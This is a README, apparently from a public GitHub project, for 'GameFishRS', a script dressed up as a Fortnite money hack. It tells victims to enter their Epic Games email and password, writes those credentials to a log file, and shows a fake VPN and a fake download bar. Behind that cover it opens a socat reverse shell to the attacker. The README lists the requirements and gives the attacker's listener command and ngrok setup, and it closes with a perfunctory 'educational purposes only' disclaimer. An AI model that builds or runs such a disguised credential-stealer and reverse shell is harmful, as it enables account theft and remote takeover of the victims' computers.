


        ⠀⠀⠀⠀⠀⠀⠀⢀⣀⣤⣤⡶⠖⠒⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣶⣶⣦⡀     ⢀⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
        ⠀⠀⠀⠀⣀⣴⣾⣿⡿⢻⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣶⣿⡿⠟⠉⠁⠙⢿⣦⣤⣾⠏ 
        ⠀⠀⣠⣾⣿⡿⠟⠁⠀⠘⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⠟⠋⠀⠀⠀⠀⠀⠀⠉⠉⠀⠀
        ⠀⣼⣿⣿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣿⡿⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
        ⣸⣿⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣿⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀    GameFishRS Hack Tool
        ⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀  <・)))><<⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀  ⣠⣾⣿⠟⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
        ⢿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣾⡿⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀    created by GhostInThe5hell/G.I.T.5.
        ⠸⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀ GameFishRS⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣠⣴⣿⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
        ⠀⠹⣿⣷⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣾⣿⠟⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀    https://pizzacakeweb.wixsite.com/pizzacake
        ⠀⠀⠘⢿⣿⣦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣾⣿⡿⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
        ⠀⠀⠀⠀⠙⢿⣿⣶⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣾⣿⡿⠟⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀    https://github.dev/GhostInThe5hell/GameFishRS/
        ⠀⠀⠀⠀⠀⠀⠙⠻⣿⣿⣶⣦⣤⣤⣀⣀⣀⣀⣤⣤⣤⣶⣾⣿⣿⠿⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
        ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠛⠻⠿⠿⣿⣿⣿⣿⡿⠿⠿⠛⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀    pizzacakeweb@gmail.com





GameFishRS - Public version

Requirements:
    -Both parties must have a stable internet connection.
    -Python3.x
    -Editor/IDE
    -Socat
    -Ngrok(over WAN)
    
Socat command to connect:
    socat file:`tty`,raw,echo=0 tcp-listen:4444

Description:

The code is a Python script that asks the user to enter their email and password to log in to Epic Games. After the user enters their information, the script writes their email and password to a log file called "log.txt".

The script then simulates starting a built-in VPN for a secure connection and pretends to connect to Epic Games. Once connected, the script displays a banner and starts a download progress bar that fills up for 15 minutes, this countdown is real and can be configured in the script.

The progress bar is updated every second to show the progress of the download, which is randomly generated between 800 and 1200 KB/s. Once the 15 minute "download/inject" process simulation begins, the script attempts to execute a thread using the "socat" tool.

"Socat" is a command line utility that allows bidirectional data transfer between two independent data channels. In this case, the script uses "socat" to establish a reverse shell connection to a remote IP address and port specified in the command.

Reverse shell connection allows remote access and control over the target system. The "socat" command runs on a separate thread to allow the progress bar to continue updating.

The "code injection" is programmed to simulate failure, the script displays an error message and suggests that the user verify their email and password and verify their Internet connection.

In general, this code attempts to execute a malicious attack by establishing a reverse shell connection to a remote IP address and port. It disguises the attack as a Fortnite money hack and simulates using a built-in VPN and a progress bar to make the attack appear more legitimate. However, attempting to execute this code is illegal and could have serious consequences.

Note: Using GameFishRS to gain an unfair advantage against someone without their consent is illegal and can result in serious consequences and may be prosecutable. This tool is for educational purposes only and use of this tool in illegal or inappropriate situations is not recommended. The creator is not responsible for the misuse of this tool.
